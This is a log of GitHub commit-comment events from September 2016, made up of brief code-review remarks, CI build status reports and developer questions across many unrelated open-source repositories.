{"id":"4581659153","type":"CommitCommentEvent","actor":{"login":"tor4kichi"},"repo":{"name":"tor4kichi/Hohoema"},"payload":{"comment":{"id":19074415,"position":null,"line":null,"path":null,"commit_id":"a44f63e79f44332ec409de9e2f24d74dedee848c","created_at":"2016-09-19T06:59:58Z","updated_at":"2016-09-19T06:59:58Z","body":"fixed to #263 "}},"created_at":"2016-09-19T06:59:58Z"}
{"id":"4581661516","type":"CommitCommentEvent","actor":{"login":"steinaol"},"repo":{"name":"MUSIT-Norway/musit-frontend"},"payload":{"comment":{"id":19074435,"position":null,"line":null,"path":null,"commit_id":"29ff642b74e33c986296bf5bb9deb6298123bf36","created_at":"2016-09-19T07:00:40Z","updated_at":"2016-09-19T07:00:40Z","body":"Bør alle this.props.history byttes ut med hashHistory?"}},"created_at":"2016-09-19T07:00:40Z"}
{"id":"4581663206","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/review"},"payload":{"comment":{"id":19074440,"position":34,"line":125,"path":"test/acceptance/comments_test.exs","commit_id":"b5f98257ce59e5a24d9c951493a68ebd57ffbddf","created_at":"2016-09-19T07:01:14Z","updated_at":"2016-09-19T07:01:14Z","body":"defp?"}},"created_at":"2016-09-19T07:01:14Z"}
{"id":"4581664537","type":"CommitCommentEvent","actor":{"login":"dzieciou"},"repo":{"name":"dzieciou/curl-logger"},"payload":{"comment":{"id":19074444,"position":6,"line":188,"path":"src/main/java/com/github/dzieciou/testing/curl/Http2Curl.java","commit_id":"f66b0931046bcf475d99ee931f4660eba79f3ab4","created_at":"2016-09-19T07:01:40Z","updated_at":"2016-09-19T07:01:40Z","body":"@blacky0x0: Can you make sure you're using REST-assured 3.0.1 version? HTTP Request should not contain cookie flags, only name and value. This was a bug in REST-assured 3.0.0 and I have fixed it in REST-assured 3.0.1."}},"created_at":"2016-09-19T07:01:40Z"}
{"id":"4581666384","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/review"},"payload":{"comment":{"id":19074447,"position":41,"line":131,"path":"test/acceptance/comments_test.exs","commit_id":"b5f98257ce59e5a24d9c951493a68ebd57ffbddf","created_at":"2016-09-19T07:02:15Z","updated_at":"2016-09-19T07:02:15Z","body":"If there's nothing like Capybara's \"loop a few times and see if the thing appears\", that could be a nice thing to contribute. Though I'm guessing you're more in a \"make it work\" mode right now :)"}},"created_at":"2016-09-19T07:02:15Z"}
{"id":"4581666986","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19074448,"position":31,"line":947,"path":"dashel/dashel-win32.cpp","commit_id":"31896634e1d49db687209d0de02a52cce92e432c","created_at":"2016-09-19T07:02:25Z","updated_at":"2016-09-19T07:02:25Z","body":"Existing static functions start with a lowercase (see `getPorts()`)."}},"created_at":"2016-09-19T07:02:25Z"}
{"id":"4581669220","type":"CommitCommentEvent","actor":{"login":"roman901"},"repo":{"name":"everypony/tabun"},"payload":{"comment":{"id":19074450,"position":51,"line":92,"path":"classes/modules/search/Search.class.php","commit_id":"84869c9ba392d889c9d021ec1924b70d4a9b266f","created_at":"2016-09-19T07:02:48Z","updated_at":"2016-09-19T07:02:48Z","body":"Блин, забыл раскомментировать. Для себя отключал, потому что отлаживать что либо с кешем импосибл."}},"created_at":"2016-09-19T07:02:48Z"}
{"id":"4581670578","type":"CommitCommentEvent","actor":{"login":"kke"},"repo":{"name":"dry-rb/dry-monads"},"payload":{"comment":{"id":19074455,"position":null,"line":null,"path":null,"commit_id":"a6eac3e47b9ad1815be0a59d695b6ece351b1c2f","created_at":"2016-09-19T07:03:15Z","updated_at":"2016-09-19T07:03:15Z","body":"Why?"}},"created_at":"2016-09-19T07:03:15Z"}
{"id":"4581673727","type":"CommitCommentEvent","actor":{"login":"YuTaeKyung"},"repo":{"name":"YuTaeKyung/Hello-Java2"},"payload":{"comment":{"id":19074460,"position":4,"line":5,"path":"src/Main.java","commit_id":"50b368fcdf82c50ecc15112e6d623e750864292a","created_at":"2016-09-19T07:04:22Z","updated_at":"2016-09-19T07:04:22Z","body":"System.out.println(\"dddd\");"}},"created_at":"2016-09-19T07:04:22Z"}
{"id":"4581676876","type":"CommitCommentEvent","actor":{"login":"Spell6inder"},"repo":{"name":"asofter/yii2-imperavi-redactor"},"payload":{"comment":{"id":19074462,"position":3,"line":2,"path":"assets/lang/ua.js","commit_id":"08e05dd323f7b8f247a68324a5767eb14ffb7a1f","created_at":"2016-09-19T07:05:20Z","updated_at":"2016-09-19T07:05:20Z","body":"Why you broke Ukrainian translation?\r\nit is wrong for common standards\r\n[https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes](https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes)\r\nand standards Yii\r\n[https://github.com/yiisoft/yii2/blob/master/framework/messages/uk/yii.php](https://github.com/yiisoft/yii2/blob/master/framework/messages/uk/yii.php)"}},"created_at":"2016-09-19T07:05:20Z"}
{"id":"4581678792","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/review"},"payload":{"comment":{"id":19074465,"position":null,"line":null,"path":null,"commit_id":"b5f98257ce59e5a24d9c951493a68ebd57ffbddf","created_at":"2016-09-19T07:06:01Z","updated_at":"2016-09-19T07:06:01Z","body":"Wonder when Phoenix might add support for missed messages with channels (sent when offline etc). That would be really nice with this tool."}},"created_at":"2016-09-19T07:06:01Z"}
{"id":"4581680235","type":"CommitCommentEvent","actor":{"login":"ziafazal"},"repo":{"name":"ayesha-baig/api-integration"},"payload":{"comment":{"id":19074469,"position":22,"line":22,"path":"edx_solutions_api_integration/management/commands/tests/test_rename_app.py","commit_id":"d3348e93cf93a9ac1d22152b9c712ca51750891e","created_at":"2016-09-19T07:06:32Z","updated_at":"2016-09-19T07:06:32Z","body":"What sort of datastructure is this? is it dict or list or what?"}},"created_at":"2016-09-19T07:06:32Z"}
{"id":"4581682646","type":"CommitCommentEvent","actor":{"login":"jcarpent"},"repo":{"name":"fvalenza/pinocchio"},"payload":{"comment":{"id":19074487,"position":4,"line":62,"path":"src/parsers/urdf/model.cpp","commit_id":"4169891e3950d0bceaf5623215e8441b8cf65275","created_at":"2016-09-19T07:07:21Z","updated_at":"2016-09-19T07:07:21Z","body":"This should be added in the math part as it can concern other part of the code. And also, can you add a TODO as landmark for future refactoring."}},"created_at":"2016-09-19T07:07:21Z"}
{"id":"4581683553","type":"CommitCommentEvent","actor":{"login":"ayesha-baig"},"repo":{"name":"ayesha-baig/api-integration"},"payload":{"comment":{"id":19074488,"position":22,"line":22,"path":"edx_solutions_api_integration/management/commands/tests/test_rename_app.py","commit_id":"d3348e93cf93a9ac1d22152b9c712ca51750891e","created_at":"2016-09-19T07:07:40Z","updated_at":"2016-09-19T07:07:40Z","body":"About the model_names? its a list"}},"created_at":"2016-09-19T07:07:40Z"}
{"id":"4581683873","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"nyalldawson/QGIS"},"payload":{"comment":{"id":19074490,"position":5,"line":42,"path":"src/analysis/network/qgsgraphbuilder.h","commit_id":"9fcbdab4f33d69dc63c134759204a6449a7b613d","created_at":"2016-09-19T07:07:47Z","updated_at":"2016-09-19T07:07:47Z","body":"Double QStringListeral?"}},"created_at":"2016-09-19T07:07:47Z"}
{"id":"4581685438","type":"CommitCommentEvent","actor":{"login":"ziafazal"},"repo":{"name":"ayesha-baig/api-integration"},"payload":{"comment":{"id":19074495,"position":27,"line":27,"path":"edx_solutions_api_integration/management/commands/tests/test_rename_app.py","commit_id":"d3348e93cf93a9ac1d22152b9c712ca51750891e","created_at":"2016-09-19T07:08:21Z","updated_at":"2016-09-19T07:08:21Z","body":"I think this definitions is useless all we need is a list of table/model names as we defined above and use it in tests. We can get a complete table name by prefixing the item in that list with app name."}},"created_at":"2016-09-19T07:08:21Z"}
{"id":"4581686220","type":"CommitCommentEvent","actor":{"login":"wangshijun"},"repo":{"name":"wangshijun/bootstrap-popover-picker"},"payload":{"comment":{"id":19074496,"position":null,"line":null,"path":null,"commit_id":"53a60afdc0e172d5c7a92c44e26fb6c7542ecc7c","created_at":"2016-09-19T07:08:38Z","updated_at":"2016-09-19T07:08:38Z","body":"@itsjaviaguilar done"}},"created_at":"2016-09-19T07:08:38Z"}
{"id":"4581687569","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"felixonmars/EnergyPlus"},"payload":{"comment":{"id":19074500,"position":null,"line":null,"path":null,"commit_id":"bfaf45db4e0cffc4d85384499dc19286faf82e15","created_at":"2016-09-19T07:09:08Z","updated_at":"2016-09-19T07:09:08Z","body":"patch-1 (felixonmars) - x86_64-MacOS-10.9-clang: OK (2332 of 2332 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-19T07:09:08Z"}
{"id":"4581689038","type":"CommitCommentEvent","actor":{"login":"taku0"},"repo":{"name":"swift-emacs/swift-mode"},"payload":{"comment":{"id":19074502,"position":null,"line":null,"path":null,"commit_id":"92119801203e2991543cbf943cc101673bd190bd","created_at":"2016-09-19T07:09:37Z","updated_at":"2016-09-19T07:09:37Z","body":"swift3-mode has v2.1.1.\r\nhttps://github.com/taku0/swift3-mode/tree/v2.1.1\r\n\r\nswift-mode v2.1.2 contains all bug fixes of v2.1.1 and other bug fixes."}},"created_at":"2016-09-19T07:09:37Z"}
{"id":"4581689378","type":"CommitCommentEvent","actor":{"login":"BROBIRD"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19074503,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T07:09:44Z","updated_at":"2016-09-19T07:09:44Z","body":"Why did you delete this file?"}},"created_at":"2016-09-19T07:09:44Z"}
{"id":"4581691452","type":"CommitCommentEvent","actor":{"login":"gangodu"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19074506,"position":null,"line":null,"path":null,"commit_id":"ee235a9ccb78a92de33c9bba7799b7b698e1c693","created_at":"2016-09-19T07:10:28Z","updated_at":"2016-09-19T07:10:28Z","body":"Sorry about the wrong commit message.. Auto-correct is so much hated .."}},"created_at":"2016-09-19T07:10:28Z"}
{"id":"4581693896","type":"CommitCommentEvent","actor":{"login":"FokkeZB"},"repo":{"name":"TheThingsNetwork/examples"},"payload":{"comment":{"id":19074515,"position":null,"line":null,"path":null,"commit_id":"83a66f33b0451dd15cde3060fad47ec078ace454","created_at":"2016-09-19T07:11:18Z","updated_at":"2016-09-19T07:11:18Z","body":"Hi @abszolut, could you create an [issue](https://github.com/TheThingsNetwork/examples/issues)? We'd love to help you out there and reserve code comments for, well.. code comments."}},"created_at":"2016-09-19T07:11:18Z"}
{"id":"4581694439","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19074516,"position":null,"line":null,"path":null,"commit_id":"20d838693d6a71197a08495add3993f4ec39ce53","created_at":"2016-09-19T07:11:29Z","updated_at":"2016-09-19T07:11:29Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1764 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-19T07:11:29Z"}
{"id":"4581694828","type":"CommitCommentEvent","actor":{"login":"edharper01"},"repo":{"name":"edharper01/godog"},"payload":{"comment":{"id":19074518,"position":null,"line":null,"path":null,"commit_id":"d8cdd56e1ea420529fb61c7e3e2db219317dd015","created_at":"2016-09-19T07:11:37Z","updated_at":"2016-09-19T07:11:37Z","body":"@l3pp4rd - thanks for the helpful suggestion. I'll work on this and raise a pull request when I'm done."}},"created_at":"2016-09-19T07:11:37Z"}
{"id":"4581696800","type":"CommitCommentEvent","actor":{"login":"kevin-frugier"},"repo":{"name":"ForestAdmin/forest-express"},"payload":{"comment":{"id":19074521,"position":null,"line":null,"path":null,"commit_id":"b02bfcdcfc543a36d3d6b13ca3dfebab9509bb0a","created_at":"2016-09-19T07:12:18Z","updated_at":"2016-09-19T07:12:18Z","body":"@arnaudbesnier : that's great ! :+1: \r\nHowever you seem to have some leading slash convention issues : \r\n`path.generate` generates `/path` or `/forest/path`, in cases where you call it with `path.generate('stats/...')` it's fine, but in some cases you call it with `path.generate('/' + modelName + '/:recordId')` which would lead to `//modelName` or `/forest//modelName`. You might be lucky it works with Express but you might want to prevent the double slash issue.\r\nEither use a convention where you don't add any leading / to your paths or in `path.generate` you may want to add a trailing slash to `pathPrefix` only if there isn't a leading slash in `path`.\r\n\r\nWhat says you? :smile: "}},"created_at":"2016-09-19T07:12:18Z"}
{"id":"4581696915","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19074522,"position":null,"line":null,"path":null,"commit_id":"20d838693d6a71197a08495add3993f4ec39ce53","created_at":"2016-09-19T07:12:20Z","updated_at":"2016-09-19T07:12:20Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-20d838693d6a71197a08495add3993f4ec39ce53-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-19T07:12:20Z"}
{"id":"4581698244","type":"CommitCommentEvent","actor":{"login":"andresfib"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":19074526,"position":15,"line":23,"path":"lib/fetching/content-services/smsgh-content-service.js","commit_id":"907475ed899f7f6a5bb29ac69929fb56f9645739","created_at":"2016-09-19T07:12:46Z","updated_at":"2016-09-19T07:12:46Z","body":"Should this anonymous function be declared somewhere else and called something like _listen"}},"created_at":"2016-09-19T07:12:46Z"}
{"id":"4581703833","type":"CommitCommentEvent","actor":{"login":"xeon-zolt"},"repo":{"name":"Catergos/mew"},"payload":{"comment":{"id":19074533,"position":null,"line":null,"path":null,"commit_id":"7bf762c371f1fbd26336bab5e3eea301e7adfd91","created_at":"2016-09-19T07:14:33Z","updated_at":"2016-09-19T07:14:33Z","body":"ahh ===========> a space\r\nhmm ==========> unzip"}},"created_at":"2016-09-19T07:14:33Z"}
{"id":"4581704093","type":"CommitCommentEvent","actor":{"login":"ziafazal"},"repo":{"name":"ayesha-baig/api-integration"},"payload":{"comment":{"id":19074534,"position":38,"line":38,"path":"edx_solutions_api_integration/management/commands/tests/test_rename_app.py","commit_id":"d3348e93cf93a9ac1d22152b9c712ca51750891e","created_at":"2016-09-19T07:14:38Z","updated_at":"2016-09-19T07:14:38Z","body":"`transaction.atomic()` does not make sense here since `TestCase` class run tests in a transaction block."}},"created_at":"2016-09-19T07:14:38Z"}
{"id":"4581704665","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":19074537,"position":null,"line":null,"path":null,"commit_id":"fa91f1a6392edd29fbabbb70a125333798ebcc4b","created_at":"2016-09-19T07:14:49Z","updated_at":"2016-09-19T07:14:49Z","body":"Thanks @craigsapp "}},"created_at":"2016-09-19T07:14:49Z"}
{"id":"4581704745","type":"CommitCommentEvent","actor":{"login":"geraldb"},"repo":{"name":"openfootball/de-deutschland"},"payload":{"comment":{"id":19074538,"position":null,"line":null,"path":null,"commit_id":"a7e631f92a2b6732bb42d571da8190b3c071e965","created_at":"2016-09-19T07:14:51Z","updated_at":"2016-09-19T07:14:51Z","body":"@enadol   Thanks for the Bundesliga updates. Keep it up. FYI: Will generate (auto-update) the .json files later today. "}},"created_at":"2016-09-19T07:14:51Z"}
{"id":"4581704863","type":"CommitCommentEvent","actor":{"login":"lastcrazydog"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19074540,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T07:14:53Z","updated_at":"2016-09-19T07:14:53Z","body":"delete？"}},"created_at":"2016-09-19T07:14:53Z"}
{"id":"4581705092","type":"CommitCommentEvent","actor":{"login":"mamipokocosk"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19074541,"position":null,"line":null,"path":null,"commit_id":"ba7291314ebe846466fc286f7b80c7d48fe07a30","created_at":"2016-09-19T07:14:58Z","updated_at":"2016-09-19T07:14:58Z","body":"I got some problem with \"Packet 0000\" then i got disconnect from the Sever\r\nwhat should i do ?\r\nI need to get news recvpacket or something els  ?\r\npls just guide me how to fix this problem \r\nthank you \r\n"}},"created_at":"2016-09-19T07:14:58Z"}
{"id":"4581705343","type":"CommitCommentEvent","actor":{"login":"andresfib"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":19074542,"position":1,"line":13,"path":"lib/fetching/content-services/smsgh-content-service.js","commit_id":"907475ed899f7f6a5bb29ac69929fb56f9645739","created_at":"2016-09-19T07:15:03Z","updated_at":"2016-09-19T07:15:03Z","body":"This method should end with a call to the super class constructor, as the other content services"}},"created_at":"2016-09-19T07:15:03Z"}
{"id":"4581705521","type":"CommitCommentEvent","actor":{"login":"YugWu"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19074543,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T07:15:08Z","updated_at":"2016-09-19T07:15:08Z","body":"what???"}},"created_at":"2016-09-19T07:15:08Z"}
{"id":"4581713282","type":"CommitCommentEvent","actor":{"login":"manoj2rox"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19074558,"position":null,"line":null,"path":null,"commit_id":"34a2b298988e4ea853b9919c1497646058c0cc25","created_at":"2016-09-19T07:17:39Z","updated_at":"2016-09-19T07:17:39Z","body":"import java.util.Scanner;\r\nimport java.lang.*;\r\npublic class pgm6\r\n{\r\n\tpublic static void main(String args[])\r\n\t{\r\n\t\tString str;\r\n\t\tint i,j;\r\n\t\tScanner in=new Scanner(System.in);\r\n\t\tstr=in.nextLine();\r\n\t\tStringBuilder sb=new StringBuilder(str);\r\n\t\tj=0;\r\n\t\tfor( i=0;i<str.length();i++)\r\n\t\t{\r\n\t\t\tif(sb.charAt(i)=='0'||sb.charAt(i)=='1'||sb.charAt(i)=='2'||sb.charAt(i)=='3'||sb.charAt(i)=='4'||sb.charAt(i)=='5'||sb.charAt(i)=='6'||sb.charAt(i)=='7'||sb.charAt(i)=='8'||sb.charAt(i)=='9')\r\n\t\t\t{\r\n\t\t\t\tj+=((int)sb.charAt(i))-48;\r\n\t\t\t}\r\n\t\t}\r\n\t\tSystem.out.println(j);\r\n\t}\r\n}\r\n"}},"created_at":"2016-09-19T07:17:39Z"}
{"id":"4581713750","type":"CommitCommentEvent","actor":{"login":"Kamilius"},"repo":{"name":"VictoriiaKlubchuk/JS-module-19-20"},"payload":{"comment":{"id":19074560,"position":18,"line":18,"path":"src/index.html","commit_id":"249cd7b48d1ef81abc94f70e1e1b847a0565bbdf","created_at":"2016-09-19T07:17:47Z","updated_at":"2016-09-19T07:17:47Z","body":"`social-menu__facebook/twitter/etc` мало б по ідеї бути `social-menu__link--facebook/twitter`... Окрім блоків і елементів, використовуй також і модифікатори, коли це потрібно"}},"created_at":"2016-09-19T07:17:47Z"}
{"id":"4581715096","type":"CommitCommentEvent","actor":{"login":"pgarrison"},"repo":{"name":"TID-Lab/aggie"},"payload":{"comment":{"id":19074562,"position":49,"line":61,"path":"lib/fetching/content-services/smsgh-content-service.js","commit_id":"907475ed899f7f6a5bb29ac69929fb56f9645739","created_at":"2016-09-19T07:18:14Z","updated_at":"2016-09-19T07:18:14Z","body":"ESLint provides this already by warning you about these tags. It's default tags are `[\"todo\", \"fixme\", \"xxx\"]` (case insensitive). You can check all of these tags throughout the project (ignoring things like `node_modules` that eslint skips) with:\r\n\r\n```\r\neslint --rule 'no-warning-comments: 2'\r\n```"}},"created_at":"2016-09-19T07:18:14Z"}
{"id":"4581719169","type":"CommitCommentEvent","actor":{"login":"Kamilius"},"repo":{"name":"VictoriiaKlubchuk/JS-module-19-20"},"payload":{"comment":{"id":19074570,"position":197,"line":197,"path":"src/index.html","commit_id":"249cd7b48d1ef81abc94f70e1e1b847a0565bbdf","created_at":"2016-09-19T07:19:34Z","updated_at":"2016-09-19T07:19:34Z","body":"Замість окремого підключення усіх скриптів, їх можна збирати в один файл (\"bundle\" - бандл) за допомогою Grunt, і підключати у HTML лише цей один фай "}},"created_at":"2016-09-19T07:19:34Z"}
{"id":"4581725906","type":"CommitCommentEvent","actor":{"login":"tommywo"},"repo":{"name":"jhillyerd/inbucket"},"payload":{"comment":{"id":19074577,"position":20,"line":33,"path":"swaks-tests/run-tests.sh","commit_id":"a2e50a7be33b2c91d751906b8c84072d18c4bee3","created_at":"2016-09-19T07:21:38Z","updated_at":"2016-09-19T07:21:38Z","body":"My intention was the ability of checking to what full address the email was send without downloading each message from mailbox, so it serves its purpose. Thanks for pointing it out."}},"created_at":"2016-09-19T07:21:38Z"}
{"id":"4581726315","type":"CommitCommentEvent","actor":{"login":"Kamilius"},"repo":{"name":"VictoriiaKlubchuk/JS-module-19-20"},"payload":{"comment":{"id":19074578,"position":null,"line":null,"path":null,"commit_id":"249cd7b48d1ef81abc94f70e1e1b847a0565bbdf","created_at":"2016-09-19T07:21:46Z","updated_at":"2016-09-19T07:21:46Z","body":"Зі скриптами, в загальному, все добре. Поправі тільки зауваження щодо BEM"}},"created_at":"2016-09-19T07:21:46Z"}
{"id":"4581732594","type":"CommitCommentEvent","actor":{"login":"backus"},"repo":{"name":"dry-rb/dry-monads"},"payload":{"comment":{"id":19074589,"position":null,"line":null,"path":null,"commit_id":"a6eac3e47b9ad1815be0a59d695b6ece351b1c2f","created_at":"2016-09-19T07:23:41Z","updated_at":"2016-09-19T07:23:41Z","body":"@kke I don't know the exact reason but ruby 2.0 is EOL so I'm going to guess that plays a part"}},"created_at":"2016-09-19T07:23:41Z"}
{"id":"4581734186","type":"CommitCommentEvent","actor":{"login":"scarletrain77"},"repo":{"name":"scarletrain77/HelloWorld"},"payload":{"comment":{"id":19074592,"position":null,"line":null,"path":null,"commit_id":"0ca4cefa4d931b6afce2a3ea268da943aeee08ea","created_at":"2016-09-19T07:24:11Z","updated_at":"2016-09-19T07:24:11Z","body":"Update"}},"created_at":"2016-09-19T07:24:11Z"}
{"id":"4581734913","type":"CommitCommentEvent","actor":{"login":"Tricky1975"},"repo":{"name":"PhantasarProductions/TFTRevamp"},"payload":{"comment":{"id":19074595,"position":null,"line":null,"path":null,"commit_id":"36c9a0348b5ecdf5ff34322b45c1b671889d0afd","created_at":"2016-09-19T07:24:25Z","updated_at":"2016-09-19T07:24:25Z","body":"The true fix lies in the library features I got, which are not part of this repository.\r\n"}},"created_at":"2016-09-19T07:24:25Z"}
{"id":"4581738023","type":"CommitCommentEvent","actor":{"login":"xitaoque"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19074604,"position":null,"line":null,"path":null,"commit_id":"fd48bc3cff29797f5f2f251ad00c1ba3caf5ea4d","created_at":"2016-09-19T07:25:24Z","updated_at":"2016-09-19T07:25:24Z","body":"Maybe this change results no cache for Image component on iOS. See details on http://stackoverflow.com/questions/39556350/why-isnt-there-any-cache-for-image-on-ios-with-rn-0-33"}},"created_at":"2016-09-19T07:25:24Z"}
{"id":"4581738344","type":"CommitCommentEvent","actor":{"login":"Petr-Kovalev"},"repo":{"name":"dannycabrera/Get-iOS-Model"},"payload":{"comment":{"id":19074605,"position":null,"line":null,"path":null,"commit_id":"bb705ddc67e9e4036d46cd495d6849612e6beed8","created_at":"2016-09-19T07:25:31Z","updated_at":"2016-09-19T07:25:31Z","body":"Extra space at the beginning of the string, line 332"}},"created_at":"2016-09-19T07:25:31Z"}
{"id":"4581742184","type":"CommitCommentEvent","actor":{"login":"hongdou0216"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19074610,"position":407,"line":407,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T07:26:45Z","updated_at":"2016-09-19T07:26:45Z","body":"数据结构层级太深。。。polygonInfo.getExtData().isShowPolygon"}},"created_at":"2016-09-19T07:26:45Z"}
{"id":"4581746512","type":"CommitCommentEvent","actor":{"login":"MagoKimbra"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":19074623,"position":null,"line":null,"path":null,"commit_id":"9a9e9afcf81a6eb7b7515df41bc2a1b099f8b849","created_at":"2016-09-19T07:28:03Z","updated_at":"2016-09-19T07:28:03Z","body":"You're a big Scott.\r\nBut I do not know if it's my BLTOUCH, but if it is wrong does not read 160, but always 90."}},"created_at":"2016-09-19T07:28:03Z"}
{"id":"4581749323","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19074627,"position":27,"line":135,"path":"app/Project.php","commit_id":"7998ae6ef08ce6cebc2a2953ae068100583cb018","created_at":"2016-09-19T07:28:55Z","updated_at":"2016-09-19T07:28:55Z","body":"@SGolenzovskiy принято"}},"created_at":"2016-09-19T07:28:55Z"}
{"id":"4581750992","type":"CommitCommentEvent","actor":{"login":"HackerWilson"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19074634,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T07:29:25Z","updated_at":"2016-09-19T07:29:25Z","body":"why...."}},"created_at":"2016-09-19T07:29:25Z"}
{"id":"4581756198","type":"CommitCommentEvent","actor":{"login":"surojdesignoffshore"},"repo":{"name":"surojdesignoffshore/php"},"payload":{"comment":{"id":19074642,"position":null,"line":null,"path":null,"commit_id":"546027d07ef98de8e9b58f019b657d750beacde5","created_at":"2016-09-19T07:31:00Z","updated_at":"2016-09-19T07:31:00Z","body":"use of \"foreach\" in test.php"}},"created_at":"2016-09-19T07:31:00Z"}
{"id":"4581758256","type":"CommitCommentEvent","actor":{"login":"samdasoxide"},"repo":{"name":"rocketpod/django-starter"},"payload":{"comment":{"id":19074649,"position":5,"line":64,"path":"{{cookiecutter.project_slug}}/README.md","commit_id":"57c94c8e145fd6a9e9101d60b64a41e65721fc3d","created_at":"2016-09-19T07:31:36Z","updated_at":"2016-09-19T07:31:36Z","body":"You can add this file be in the root of the project."}},"created_at":"2016-09-19T07:31:36Z"}
{"id":"4581758759","type":"CommitCommentEvent","actor":{"login":"volaya"},"repo":{"name":"volaya/QGIS"},"payload":{"comment":{"id":19074652,"position":728,"line":728,"path":"python/plugins/processing/gui/wrappers.py","commit_id":"8a22cf413377facf4ffad828f71594875b88c5e6","created_at":"2016-09-19T07:31:45Z","updated_at":"2016-09-19T07:31:45Z","body":"Yes. We do not know the fields available for the layer, since the parent layer is a filename andnot a loaded layer always. So we cannot add a combo box"}},"created_at":"2016-09-19T07:31:45Z"}
{"id":"4581762365","type":"CommitCommentEvent","actor":{"login":"hongdou0216"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19074662,"position":432,"line":432,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-19T07:32:51Z","updated_at":"2016-09-19T07:32:51Z","body":"dtd不是自己传的吗，还需要判断吗"}},"created_at":"2016-09-19T07:32:51Z"}
{"id":"4581762627","type":"CommitCommentEvent","actor":{"login":"jahller"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19074663,"position":null,"line":null,"path":null,"commit_id":"ffe5c49c3ebb51d534a339e0d85a0aa7967923dc","created_at":"2016-09-19T07:32:56Z","updated_at":"2016-09-19T07:32:56Z","body":"Good job guys :)"}},"created_at":"2016-09-19T07:32:56Z"}
